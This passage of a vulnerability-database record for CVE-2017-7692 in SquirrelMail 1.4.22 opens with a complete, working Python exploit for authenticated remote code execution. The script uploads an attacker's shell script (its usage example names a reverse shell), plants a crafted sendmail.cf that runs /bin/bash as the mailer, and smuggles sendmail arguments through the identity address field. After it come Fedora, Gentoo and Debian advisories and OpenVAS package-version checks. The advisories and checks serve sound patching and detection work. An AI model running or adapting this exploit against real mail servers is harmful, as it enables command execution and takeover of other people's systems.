com\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import unicode_literals\r\nimport sys\r\nimport os\r\nimport re\r\nimport requests\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\n\r\nSENDMAILCF=\"/tmp/squirrelmail1_4_22-sendmailcf-rce\"\r\nCOMPOSE = \"/src/compose.php\"\r\nINFOS = \"/src/options.php?optpage=personal\"\r\nSQM_ATTACH_PATH = \"/var/local/squirrelmail/attach/\"\r\n# must be enclosed in <> otherwise spaces will be removed ..\r\nSENDER = \"<px () xxxx com -OQueueDirectory=/tmp -C %s%s>\"\r\n\r\n\r\nSESSID = \"\"\r\nBASEURL = \"\"\r\n\r\n\r\ndef attach(attachment):\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": 
token,\r\n \"attach\": \"add\"\r\n }\r\n\r\n try:\r\n files = {'attachfile': open(attachment,'rb')}\r\n resp = requests.post(url, files=files, data=values, cookies={'SQMSESSID':SESSID})\r\n fname = re.search(r'att_local_name";s:[0-9]+:"([a-zA-Z0-9]+)"', resp.text)\r\n if not fname:\r\n print \"\\nError: unable to upload file %s\" % attachment\r\n return fname.group(1)\r\n\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef send():\r\n url = \"%s%s\" % (BASEURL, COMPOSE)\r\n token = get_csrf_token(url)\r\n\r\n values = {\r\n \"smtoken\": token,\r\n \"send_to\": \"root\",\r\n \"send\": \"Send\"\r\n }\r\n\r\n try:\r\n resp = requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef set_identity(sender):\r\n url = \"%s%s\" % (BASEURL, INFOS)\r\n token = get_csrf_token(url)\r\n values = {\r\n \"smtoken\": token,\r\n \"optpage\": \"personal\",\r\n \"optmode\": \"submit\",\r\n \"new_email_address\": sender,\r\n \"submit_personal\": \"Submit\"\r\n }\r\n\r\n try:\r\n requests.post(url, data=values, cookies={'SQMSESSID':SESSID})\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n\r\n\r\ndef get_csrf_token(url):\r\n try:\r\n body = requests.get(url, cookies={'SQMSESSID':SESSID}).text\r\n inp = re.search(r'<input.*name=\"smtoken\".*>', body, re.MULTILINE)\r\n token = re.search(r'value=\"([a-zA-Z0-9]+)\"', inp.group(0))\r\n if token:\r\n return token.group(1)\r\n except Exception as e:\r\n pass\r\n\r\n print \"\\nUnable to get CSRF token\"\r\n sys.exit(1)\r\n\r\ndef outw(s):\r\n sys.stdout.write(s)\r\n sys.stdout.flush()\r\n\r\ndef main(argv):\r\n global BASEURL\r\n global SESSID\r\n\r\n if len(argv) != 4:\r\n print (\r\n \"SquirrelMail 1.4.22 Remote Code Execution (authenticated) - filippo.cavallarin () wearesegment com\\n\"\r\n \"The target server must use sendmail and squirrelmail must be configured to use 
/usr/bin/sendmail\\n\"\r\n \"Usage:\\n\"\r\n \" %s <url> <session_id> <script>\\n\"\r\n \" url: the url of squirrelmail\\n\"\r\n \" session_id: the value of SQMSESSID cookie\\n\"\r\n \" script: the path to the bash script to be executed on the target\\n\"\r\n \"Example:\\n\"\r\n \" %s http:/example.com/squirrelmail/ l2rapvcovsui1on0b4i5boev24 reverseshell.sh\"\r\n ) % (argv[0], argv[0])\r\n\r\n sys.exit(1)\r\n\r\n BASEURL = argv[1]\r\n SESSID = argv[2]\r\n script = argv[3]\r\n\r\n outw(\"Uploading script ... \")\r\n script_fname = attach(script)\r\n print \"ok\"\r\n\r\n\r\n outw(\"Generating sendmail.cf ... \")\r\n try:\r\n script_path = \"%s%s\" % (SQM_ATTACH_PATH, script_fname)\r\n with open(SENDMAILCF, 'w') as f:\r\n f.write(SENDMAILCF_CONTENT % script_path)\r\n except Exception as e:\r\n print \"\\nError: %s\" % e\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Uploading sendmail.cf ... \")\r\n smc_fname = attach(SENDMAILCF)\r\n os.remove(SENDMAILCF)\r\n print \"ok\"\r\n\r\n outw(\"Updating user options ... \")\r\n sender = SENDER % (SQM_ATTACH_PATH, smc_fname)\r\n set_identity(sender)\r\n print \"ok\"\r\n\r\n outw(\"Checking identity field ... \")\r\n icheck = requests.get(\"%s%s\" % (BASEURL, INFOS), cookies={'SQMSESSID':SESSID}).text\r\n if not smc_fname in icheck:\r\n print \"\\nError: unable to set identity field .. maybe squirrelmail is configured with edit_identity=false\"\r\n sys.exit(1)\r\n print \"ok\"\r\n\r\n outw(\"Executing script ... 
\")\r\n send()\r\n print \"ok\\n\"\r\n sys.exit(0)\r\n\r\nSENDMAILCF_CONTENT = \"\"\"\r\nO \r\nDontBlameSendmail=,AssumeSafeChown,ForwardFileInGroupWritableDirPath,GroupWritableForwardFileSafe,GroupWritableIncludeFileSafe,IncludeFileInGroupWritableDirPath,DontWarnForwardFileInUnsafeDirPath,TrustStickyBit,NonRootSafeAddr,GroupWritableIncludeFile,GroupReadableDefaultAuthInfoFile\r\nKdequote dequote\r\nScanonify=3\r\nR$@ $@ <@>\r\nR$* $: $1 <@> mark addresses\r\nR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>\r\nR@ $* <@> $: @ $1 unmark @host:...\r\nR$* [ IPv6 : $+ ] <@> $: $1 [ IPv6 : $2 ] unmark IPv6 addr\r\nR$* :: $* <@> $: $1 :: $2 unmark node::addr\r\nR:include: $* <@> $: :include: $1 unmark :include:...\r\nR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colon\r\nR$* : $* <@> $: $2 strip colon if marked\r\nR$* <@> $: $1 unmark\r\nR$* ; $1 strip trailing semi\r\nR$* < $+ :; > $* $@ $2 :; <@> catch <list:;>\r\nR$* < $* ; > $1 < $2 > bogus bracketed semi\r\nR$@ $@ :; <@>\r\nR$* $: < $1 > housekeeping <>\r\nR$+ < $* > < $2 > strip excess on left\r\nR< $* > $+ < $1 > strip excess on right\r\nR<> $@ < @ > MAIL FROM:<> case\r\nR< $+ > $: $1 remove housekeeping <>\r\nR@ $+ , $+ $2\r\nR@ [ $* ] : $+ $2\r\nR@ $+ : $+ $2\r\nR $+ : $* ; @ $+ $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax\r\nR $+ : $* ; $@ $1 : $2; list syntax\r\nR$+ @ $+ $: $1 < @ $2 > focus on domain\r\nR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right\r\nR$+ < @ $+ > $@ $>Canonify2 $1 < @ $2 > already canonical\r\nR$- ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names\r\nR$+ . $- ! $+ $@ $>Canonify2 $3 < @ $1 . $2 > domain uucps\r\nR$+ ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains\r\nR$* %% $* $1 @ $2 First make them all @s.\r\nR$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last.\r\nR$* @ $* $@ $>Canonify2 $1 < @ $2 > Insert < > and finish\r\nR$* $@ $>Canonify2 $1\r\nSCanonify2=96\r\nR$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at all\r\nR$* < @ localhost . $m > $* $: $1 < @ $j . 
> $2 local domain\r\nR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain\r\nR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr]\r\nR$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal\r\nR$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr\r\nSfinal=4\r\nR$+ :; <@> $@ $1 : handle <list:;>\r\nR$* <@> $@ handle <> and list:;\r\nR$* < @ $+ . > $* $1 < @ $2 > $3\r\nR$* < @ *LOCAL* > $* $1 < @ $j > $2\r\nR$* < $+ > $* $1 $2 $3 defocus\r\nR@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical\r\nR@ $* $@ @ $1 ... and exit\r\nR$+ @ $- . UUCP $2!$1 u () h UUCP => h!u\r\nR$+ %% $=w @ $=w $1 @ $2 u%%host@host => u@host\r\nSRecurse=97\r\nR$* $: $>canonify $1\r\nR$* $@ $>parse $1\r\nSparse=0\r\nR$* $: $>Parse0 $1 initial parsing\r\nR<@> $#local $: <@> special case error msgs\r\nR$* $: $>ParseLocal $1 handle local hacks\r\nR$* $: $>Parse1 $1 final parsing\r\nSParse0\r\nR<@> $@ <@> special case error msgs\r\nR$* : $* ; <@> $#error $@ 5.1.3 $: \"553 List:; syntax illegal for recipient addresses\"\r\nR@ <@ $* > < @ $1 > catch \"@@host\" bogosity\r\nR<@ $+> $#error $@ 5.1.3 $: \"553 User address required\"\r\nR$+ <@> $#error $@ 5.1.3 $: \"553 Hostname required\"\r\nR$* $: <> $1\r\nR<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4\r\nR<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4\r\nR<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: \"553 Invalid address\"\r\nR<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3\r\nR<> $* <$* : $* > $* $#error $@ 5.1.3 $: \"553 Colon illegal in host name part\"\r\nR<> $* $1\r\nR$* < @ . $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* .. $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\"\r\nR$* < @ $* @ > $* $#error $@ 5.1.2 $: \"553 Invalid route address\"\r\nR$* @ $* < @ $* > $* $#error $@ 5.1.3 $: \"553 Invalid route address\"\r\nR$* , $~O $* $#error $@ 5.1.3 $: \"553 Invalid route address\"\r\nR$* < @ > $* $@ $>Parse0 $>canonify $1 user@ => user\r\nR< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... 
-> ...\r\nR$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote \"foo\"@here\r\nR< @ $+ > $#error $@ 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ $=w . > $@ $>Parse0 $>canonify $1 $2 $3 ...@here -> ...\r\nR$- $: $(dequote $1 $) < @ *LOCAL* > dequote \"foo\"\r\nR< @ *LOCAL* > $#error $@ 5.1.3 $: \"553 User address required\"\r\nR$* $=O $* < @ *LOCAL* >\r\n $@ $>Parse0 $>canonify $1 $2 $3 ...@*LOCAL* -> ...\r\nR$* < @ *LOCAL* > $: $1\r\nSParse1\r\nR$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec\r\nR$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path\r\nR$* < @ [ $+ ] : > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost: send\r\nR$* < @ [ $+ ] : $- : $*> $* $#$3 $@ $4 $: $1 < @ [$2] > $5 smarthost with mailer\r\nR$* < @ [ $+ ] : $+ > $* $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost without mailer\r\nR$=L < @ $=w . > $#local $: @ $1 special local names\r\nR$+ < @ $=w . > $#local $: $1 regular local name\r\nR$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name\r\nR$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain\r\nR$=L $#local $: @ $1 special local names\r\nR$+ $#local $: $1 regular local names\r\nSLocal_localaddr\r\nSlocaladdr=5\r\nR$+ $: $1 $| $>\"Local_localaddr\" $1\r\nR$+ $| $#ok $@ $1 no change\r\nR$+ $| $#$* $#$2\r\nR$+ $| $* $: $1\r\nR$+ + * $#local $@ $&h $: $1\r\nR$+ + $* $#local $@ + $2 $: $1 + *\r\nR$+ $: <> $1\r\nR< > $+ $: < > < $1 <> $&h > nope, restore +detail\r\nR< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail\r\nR< > < $+ <> $* > $: < > < $1 > else discard\r\nR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part\r\nR< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +\r\nR< > < $+ > $@ $1 no +detail\r\nR$+ $: $1 <> $&h add +detail back in\r\nR$+ <> + $* $: $1 + $2 check whether +detail\r\nR$+ <> $* $: $1 else discard\r\nR< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension\r\nR< error : $* > $* $: $>MailerToTriple 
< error : $1 > $2 no host extension\r\nR< $~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 >\r\nR< $+ > $+ $@ $>MailerToTriple < $1 > $2 < @ $1 >\r\nSParseLocal=98\r\nSEnvFromL\r\nR<@> $n errors to mailer-daemon\r\nR@ <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqEnv $1 do masquerading\r\nSEnvToL\r\nR$+ < @ $* > $: $1 strip host part\r\nR$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type\r\nR<e s> $+ + $* $: $1 remove +detail for sender\r\nR< $* > $+ $: $2 else remove mark\r\nSHdrFromL\r\nR<@> $n errors to mailer-daemon\r\nR@ <@ $*> $n temporarily bypass Sun bogosity\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do masquerading\r\nSHdrToL\r\nR$+ $: $>AddDomain $1 add local domain if needed\r\nR$* $: $>MasqHdr $1 do all-masquerading\r\nSAddDomain\r\nR$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified\r\nR$+ $@ $1 < @ *LOCAL* > add local qualification\r\nMlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X %s\r\nMprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/,\r\n T=X-Unix/X-Unix/X-Unix,\r\n A=sh -c $u\r\n\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93005", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "SquirrelMail is a basic webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. 
", "modified": "2017-06-03T02:25:05", "published": "2017-06-03T02:25:05", "id": "FEDORA:70FB5602F586", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: squirrelmail-1.4.22-19.fc24", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "SquirrelMail is a basic webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. ", "modified": "2017-06-03T02:37:03", "published": "2017-06-03T02:37:03", "id": "FEDORA:20BC26069BE6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: squirrelmail-1.4.22-19.fc25", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "SquirrelMail is a basic webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. ", "modified": "2017-06-09T19:36:12", "published": "2017-06-09T19:36:12", "id": "FEDORA:4913A60478E1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: squirrelmail-1.4.22-19.fc26", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-09-17T23:59:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "### Background\n\nSquirrelMail is a webmail package written in PHP. It supports IMAP and SMTP and can optionally be installed with SQL support. \n\n### Description\n\nIt was discovered that the sendmail.cf file is mishandled in a popen call. 
\n\n### Impact\n\nA remote attacker, by enticing a user to open an e-mail attachment, could execute arbitrary shell commands. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nGentoo has discontinued support for SquirrelMail and recommends that users unmerge the package: \n \n \n # emerge --unmerge \"mail-client/squirrelmail\"", "edition": 1, "modified": "2017-09-17T00:00:00", "published": "2017-09-17T00:00:00", "href": "https://security.gentoo.org/glsa/201709-13", "id": "GLSA-201709-13", "title": "SquirrelMail: Remote Code Execution", "type": "gentoo", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-06-03T00:00:00", "id": "OPENVAS:1361412562310872735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872735", "type": "openvas", "title": "Fedora Update for squirrelmail FEDORA-2017-f85c37ae3d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squirrelmail FEDORA-2017-f85c37ae3d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872735\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-03 07:04:44 +0200 (Sat, 03 Jun 2017)\");\n script_cve_id(\"CVE-2017-7692\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for squirrelmail FEDORA-2017-f85c37ae3d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squirrelmail'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"squirrelmail on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-f85c37ae3d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UNTLMY5LPO22GYRCH3FBZ6YFBHUHXRHD\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"squirrelmail\", rpm:\"squirrelmail~1.4.22~19.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "modified": "2019-03-18T00:00:00", "published": "2017-05-13T00:00:00", "id": "OPENVAS:1361412562310703852", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703852", "type": "openvas", "title": "Debian Security Advisory DSA 3852-1 (squirrelmail - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3852.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3852-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703852\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-7692\");\n script_name(\"Debian Security Advisory DSA 3852-1 (squirrelmail - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-13 00:00:00 +0200 (Sat, 13 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3852.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"squirrelmail on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\n\nWe recommend that you upgrade your squirrelmail packages.\");\n script_tag(name:\"summary\", value:\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. 
This\nwould allow a logged-in user to run arbitrary commands on the server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"2:1.4.23~svn20120406-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:57:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "modified": "2017-07-07T00:00:00", "published": "2017-05-13T00:00:00", "id": "OPENVAS:703852", "href": "http://plugins.openvas.org/nasl.php?oid=703852", "type": "openvas", "title": "Debian Security Advisory DSA 3852-1 (squirrelmail - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3852.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3852-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703852);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2017-7692\");\n script_name(\"Debian Security Advisory DSA 3852-1 (squirrelmail - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-05-13 00:00:00 +0200 (Sat, 13 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3852.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"squirrelmail on Debian Linux\");\n script_tag(name: \"insight\", value: \"SquirrelMail is a standards-based webmail package written in PHP. It\nincludes built-in pure PHP support for the IMAP and SMTP protocols, and\nis designed for maximum compatibility across browsers. SquirrelMail has\nfew requirements and is easy to configure and install. 
It runs on top of\nany IMAP server.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\n\nWe recommend that you upgrade your squirrelmail packages.\");\n script_tag(name: \"summary\", value: \"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"2:1.4.23~svn20120406-2+deb8u1\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-06-03T00:00:00", "id": "OPENVAS:1361412562310872733", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872733", "type": "openvas", "title": "Fedora Update for squirrelmail FEDORA-2017-0b6da97aa5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squirrelmail FEDORA-2017-0b6da97aa5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
